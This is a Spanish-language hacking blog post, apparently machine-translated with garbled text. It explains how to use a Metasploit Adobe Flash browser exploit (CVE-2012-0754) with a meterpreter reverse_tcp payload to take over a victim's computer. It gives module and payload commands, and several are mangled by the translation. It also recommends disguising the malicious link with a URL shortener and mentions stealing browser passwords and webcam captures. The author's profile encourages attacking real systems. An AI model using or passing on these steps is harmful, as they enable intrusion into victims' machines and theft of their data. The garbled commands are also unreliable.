Infectando una URL maliciosa con un documento Adobe FLASH
Flash y los otros productos de Adobe han tenido una mala reputación
para el diseƱo de mala calidad e inseguro durante bastante tiempo
ahora.El
problema es tan grave, que Apple no permitirĆ” Flash en su sistema
operativo iOS, lo que enfureció a muchos usuarios, pero manteniendo iOS
mĆ”s seguro y eficiente de la energĆa (cuando Flash se bloquea, se
absorbe la energĆa de la baterĆa y se bloquea con frecuencia, ya que
todos sabemos demasiado bien).En un tutorial anterior, he mostrado cómo encontrar vulnerabilidades utilizando el SecurityFocus base de datos. Vamos a ir allà de nuevo y echar un vistazo a las vulnerabilidades de Adobe Flash.http://www.securityfocus.com/
Paso 1: la bĆŗsqueda de vulnerabilidades
Cuando vamos a securityfocus y buscamos la base de datos para Adobe y
Flash Player, obtenemos 8 pƔginas de vulnerabilidades con 20
vulnerabilidades por pĆ”gina. Es obvio de esta lista que Flash estĆ” desgarrado con problemas de seguridad.PodrĆamos
pasar semanas de pasar y pasar por todas las vulnerabilidades de Adobe
Flash Player, pero voy a dejar eso para que usted haga. XD
Si
usted estĆ” buscando una vulnerbailidad para atacar a un equipo en una
red, lo mejor que puedes hacer es pasar tu tiempo enfocado en Adobe
Flash. Hay tantas vulnerabilidades y otros nuevas llegan a diario!
Cuando hacemos clic en la pestaña en la parte superior de la pÔgina, que nos lleva a un enlace a la explotación. A continuación, puede descargar o copiar y pegar para su uso.
Abrimos nuestro Metasploit y buscamos las ejecucciones construidas para aprovechar las vulnerabilidades de Adobe Flash Player. BĆŗsqueda de "flash" con el siguiente comando.
msf> flash de bĆŗsqueda
Cuando
lo hago, encuentro numerosas ejecucciones flash, pero he destacado la
que estamos usando aquĆ y corresponde a CVE-2.012 a 0754. Ahora vamos a usarlo.
msf> uso exploit / windows / browser / adobe_flash_mp4_cprt
Cuando hacemos eso, cargarÔ el exploit en la consola. Ahora vamos a llegar mÔs información sobre el mismo.
ventanas msf> conjunto de carga Ćŗtil / meterpreter / reverse_tcp
Una vez que hemos creado el payload, una vez mƔs tenemos que comprobar las opciones que tienen su propio conjunto de opciones. Cuando lo hacemos, vemos que tenemos que establecer el LHOST (la IP de nuestra mƔquina local) para el meterpreter.
msf> set LHOST 192.168.1.104
Paso 5: Explotar!
Con todos los parÔmetros que necesitamos fijados, lo único que tenemos que hacer :
Con un poco de suerte (este metodo no funciona el 100% de las veces, mƔs como 50%) ya que el link es muy obvio.
Pero algo que me sirve a mi es un acortador de links >;) aumentando el porcentaje a 95%, si todo sale bien aparecerĆ” el sĆmbolo del Meterpreter y usted serĆ” dueƱo de su sistema por completo.https://adf.ly/Si no has visto mi publicación de como usar "Meterpreter", sacar contraseƱas de los navegadores de la victima, capturas de webcam & mucho mĆ”s.te dejo el link aquĆ abajo:
La
piraterĆa en los sistemas operativos modernos es cada vez mĆ”s difĆcil,
ya que Microsoft y otros proveedores de software de seguridad se
vuelven mƔs enfocado.El hacker siempre se puede encontrar una manera de entrar, si son persistentes y creativos.
Fuentes como SecurityFocus y otras bases de datos de vulnerabilidad
(incluso propias de Microsoft) estĆ” registrando constantemente
vulnerabilidades y el hacker simplemente tiene que estar un paso
adelante de los proveedores de software.
Mucha suerte
Exploit
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.
About Me
Adam Armbruster
No seras ni siquiera mediocre si no vulneras sistemas reales, con el peligro real de ser atrapado.
-Ćŗnico perfil que manejo: https://www.facebook.com/AdamExploit
Ranking blog
The Hacking Suite Toolkit IMVU.
The Hacking Suite Toolkit IMVU + Script HTML 250 dólares via paypal. Noviembre/2015.Método para hibridar su anonimato...
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.